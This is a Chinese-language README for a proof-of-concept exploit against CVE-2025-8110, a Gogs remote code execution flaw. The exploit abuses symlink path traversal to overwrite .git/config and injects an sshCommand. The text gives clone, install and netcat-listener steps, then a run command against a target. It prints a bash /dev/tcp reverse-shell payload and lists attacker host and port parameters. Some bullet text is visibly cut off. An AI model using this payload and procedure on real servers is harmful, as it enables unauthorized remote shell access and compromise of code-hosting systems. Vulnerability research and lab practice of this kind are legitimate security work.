
用于CVE-2025-8110的概念验证利用程序,这是一个Gogs远程代码执行漏洞,利用符号链接进行路径遍历和sshCommand注入以传递反向shell。
针对 CVE-2025-8110 的概念验证 (PoC) 程序,这是 Gogs 中的一个严重漏洞,允许通过符号链接绕过和 sshCommand 注入操纵 .git/config 来实现远程代码执行 (RCE)。
此漏洞利用针对 Gogs API 内容管理中的路径遍历缺陷。已认证用户可以:
.git/config 的符号链接。sshCommand,当服务器执行 Git 操作时触发反向 Shell。!、@)。Rich 库提供高可见性日志。克隆仓库:
git clone https://github.com/Ghxstsec/CVE-2025-8110.git
cd CVE-2025-8110
安装依赖:
pip3 install -r requirements.txt
启动你的监听器:
nc -lvnp 6666
运行漏洞利用:
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'
参数:
sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
当 Gogs 执行需要网络传输(如镜像同步或内部引用检查)的 Git 命令时,它会调用 sshCommand,从而触发反向 Shell。
| 参数 | 描述 |
|---|
-u, --url | 目标 Gogs 实例的基础 URL(例如 http://target.htb:3000)。 |
-lh, --host | 攻击者 IP (LHOST),反向 Shell 将回连到此地址。 |
-lp, --port | 在你的机器上配置的监听端口 (LPORT)。 |
-p, --password | 用于执行身份验证的 pwnuser 账户密码。 |
-x, --proxy | (可选)通过本地代理路由流量(默认:http://localhost:8080)。 |